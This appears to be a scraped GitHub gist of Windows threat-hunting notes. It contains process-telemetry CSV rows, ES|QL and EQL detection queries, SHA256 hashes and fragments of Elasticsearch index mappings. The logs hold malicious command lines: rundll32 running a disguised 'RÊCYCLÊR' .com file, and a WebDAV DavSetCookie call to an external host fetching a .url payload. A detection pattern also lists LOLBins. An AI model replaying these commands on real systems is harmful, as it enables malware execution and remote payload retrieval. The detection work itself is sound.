Skip to content

Instantly share code, notes, and snippets.

"Top 1000 values of process.executable","Top 1000 values of process.command_line","Top 1000 values of process.working_directory","Count of records"
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""Program Files (x86)""","C:\Users\user\Desktop\",6
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""Windows""","C:\Users\user\Desktop\",8
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""ProgramData""","C:\Users\user\Desktop\",6
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""Recovery""","C:\Users\user\Desktop\",7
"C:\Windows\System32\rundll32.exe","""C:\Windows\System32\rundll32.exe"" Shell32.dll,ShellExec_RunDLL ""RÊCYCLÊR\  .com"" ""Documents and Settings""","C:\Users\user\Desktop\",11
"C:\Windows\System32\rundll32.exe
// hunting on scheduled task via registry.data.bytes
from logs-endpoint.events.registry-*
| where host.os.type == "windows" and event.category == "registry" and event.action == "modification" and
registry.path like """HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*Actions*"""
| eval scheduled_task_action = replace(TO_LOWER(FROM_BASE64(registry.data.bytes)), """\u0000""", "")
| eval scheduled_task_action = replace(scheduled_task_action, """(\u0003\fauthorfff|\u0003\fauthorff\u000e)""", "")
| where scheduled_task_action rlike """.*(users\\public\\|\\appdata\\roaming|programdata|powershell|rundll32|regsvr32|mshta.exe|cscript.exe|wscript.exe|cmd.exe|forfiles|msiexec).*""" and not scheduled_task_action like "localsystem*"
| keep scheduled_task_action, registry.path, agent.id
| stats count_agents = count_distinct(agent.id) by scheduled_task_action | where count_agents == 1
This file has been truncated, but you can view the full file.
98faaafd3b450d836415eff09da56591fe31c54b4a668498416537262f2cd4c6
d5760da745c915753a1364a3d9762e75b503192327473bb3bda85282a532f4bc
ae67088e35d84034a56217bffe9aa3f830ea745b521432a6406106f446cfcee2
c382b67f4330082877b179fa1d7178cb8261f7519b2bf46965e6cabcd4c943b4
c7fb77d22e1d937220cc3a7527dd9eb6f5b663da81c830c67f1ba892a868ca27
68864134a67842ac2f863dfd92ec6ad6567571a436663b0bceda9e2ef0222de2
e8cbafcf196bb80ccb2249e8f6a18c02d8d67926a298165592c4ec742851749f
f67dd838b2a5fbb4739bd30ca721240f99f2f66e49c352aa600f2d443004c787
159dc9de2d297a560eda6f1a1b861d4fe52a285aa475137fc32688ccde8de7e5
f900d5bebd2241a0f1bf969c7c2ece6b6f53440d97ee3ddcd19566866a2dca18
"process": {
"args": [
"rundll32.exe",
"C:\\WINDOWS\\system32\\davclnt.dll,DavSetCookie",
"brukjanesis.com@80",
"http://brukjanesis.com/TrdGallery/ResultTrd.bmp.url"
],
// DLLs normally located in system32 but unsigned and loaded from elsewhere
// https://www.elastic.co/guide/en/elasticsearch/reference/master/esql-enrich-data.html
// example ENRICH libs-policy creation steps
https://gist.github.com/Samirbous/9f9c3237a0ada745e71cc2ba3425311c
ES|QL query:
from .ds-logs-endpoint.events.library-*
| where event.action == "load" and process.code_signature.status == "trusted" and dll.code_signature.status != "trusted" and
// requires 4688 - process creation audit to be enabled
// EQL query
process where event.action == "created-process" and
not startswith~(winlog.event_data.TargetUserSid, winlog.event_data.SubjectUserSid) and
winlog.event_data.TargetUserSid : "S-1-5-21-*" and not winlog.event_data.TargetUserSid: "S-1-0-0" and
not process.parent.executable : ("?:\\Program Files\\*", "?:\\Program Files (x86)\\*", "?:\\Windows\\System32\\svchost.exe", "?:\\Windows\\System32\\runtimebroker.exe")
// ES|QL query - frequency based - 1 host with a unique parent and child proc running as different user identities
// DLLs normally located in system32 but unsigned and loaded from elsewhere
// https://www.elastic.co/guide/en/elasticsearch/reference/master/esql-enrich-data.html
// example ENRICH libs-policy creation steps
https://gist.github.com/Samirbous/9f9c3237a0ada745e71cc2ba3425311c
// create source index and define types
PUT /libs
{
"mappings": {
"properties": {
"dll": {
"properties": {
"name": {
"type": "text",
"fields": {
PUT /native_dll1_index
{
"mappings": {
"properties": {
"dll": {
"properties": {
"name": {
"type": "text",
"fields": {
"keyword": {